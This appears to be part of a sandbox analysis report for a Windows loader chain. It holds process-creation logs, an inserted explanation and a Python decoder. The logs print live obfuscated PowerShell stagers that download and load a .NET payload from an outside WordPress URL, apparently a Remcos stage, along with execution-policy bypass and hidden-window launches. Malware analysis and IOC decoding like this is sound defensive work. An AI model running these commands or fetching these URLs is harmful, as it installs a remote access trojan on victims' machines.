Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
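The command lines above carry a two-layer stager. The outer PowerShell holds a UTF-16LE base64 blob in which every 'A' has been swapped for a space (which is why the decoder starts with $ExeNy.replace(' ','A')), and the inner command it produces passes the second-stage URL as a reversed string: 'txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' read backwards is https://www.informacionoportuna.com/wp-content/uploads/2024/07/remcos.txt, so the host name never appears forwards in the process command line. The decoder below is an added example, not code from the report or from the sample: it re-creates the encoding on a constructed command with a hypothetical example.invalid host so it runs offline, and only the REVERSED_ARG constant and the %pzAcOgInMr% placeholder are taken from the report.

```python
"""Decode the two-layer PowerShell stager from the process tree above.

Added example, not code from the report or from the sample. Layer 1 is what
the outer command line does:  $ExeNy.replace(' ','A')  ->  FromBase64String
->  Unicode.GetString  ->  .replace('%pzAcOgInMr%', <path of the running .vbs>).
Layer 2 is inside the decoded command: the second-stage URL is handed to the
.NET stage reversed, so it does not appear forwards in the command line.
"""
import base64
import re

# Placeholder the loader swaps for the running script's path (taken from the report).
PLACEHOLDER = "%pzAcOgInMr%"

# Reversed-URL argument exactly as it appears in the decoded command on this page.
REVERSED_ARG = "txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth"

# Constructed sample command (NOT the page's blob): same shape as the real one,
# with a hypothetical example.invalid host so the example runs offline.
SAMPLE_COMMAND = (
    "$a = '001';$p = '%pzAcOgInMr%';"
    "[Byte[]] $b = [system.Convert]::FromBase64String("
    "(New-Object Net.WebClient).DownloadString('https://example.invalid/stage2.txt'));"
    "Invoke($null, [object[]] ('txt.daolyap/dilavni.elpmaxe//:sptth', $p, $a));"
)

URL_RE = re.compile(r"https?://[^\s'\"()]+")
LITERAL_RE = re.compile(r"'([^']*)'")


def obfuscate(command):
    """Re-create the loader's encoding, only to build sample input:
    UTF-16LE -> base64 -> every 'A' replaced by a space. This is losslessly
    reversible because a space can never occur in base64 output."""
    b64 = base64.b64encode(command.encode("utf-16-le")).decode("ascii")
    return b64.replace("A", " ")


def deobfuscate(blob, script_path):
    """Undo layer 1: restore 'A', base64-decode, read as UTF-16LE, fill the placeholder."""
    b64 = blob.replace(" ", "A")
    raw = base64.b64decode(b64)          # binascii.Error here means a truncated/corrupt blob
    command = raw.decode("utf-16-le")
    return command.replace(PLACEHOLDER, script_path)


def unreverse(s):
    """Undo layer 2: read the reversed argument backwards to recover the URL."""
    return s[::-1]


def extract_iocs(command):
    """Return plain URLs and single-quoted literals that become URLs when reversed."""
    plain = URL_RE.findall(command)
    reversed_urls = []
    for literal in LITERAL_RE.findall(command):
        candidate = unreverse(literal)
        if candidate.startswith(("http://", "https://")):
            reversed_urls.append(candidate)
    return {"plain": plain, "reversed": reversed_urls}


if __name__ == "__main__":
    blob = obfuscate(SAMPLE_COMMAND)
    decoded = deobfuscate(blob, r"C:\Users\user\Desktop\sostener.vbs")
    print(decoded)
    print(extract_iocs(decoded))
    print(unreverse(REVERSED_ARG))
```

To decode the real blob, paste the $ExeNy string from the command line above into deobfuscate() with the script path the sandbox used; the placeholder substitution is what makes the decoded command differ between the Desktop and %TEMP% launches listed above. Never fetch the recovered URLs from an analysis host; they are live IOCs, not test fixtures.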
                        Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
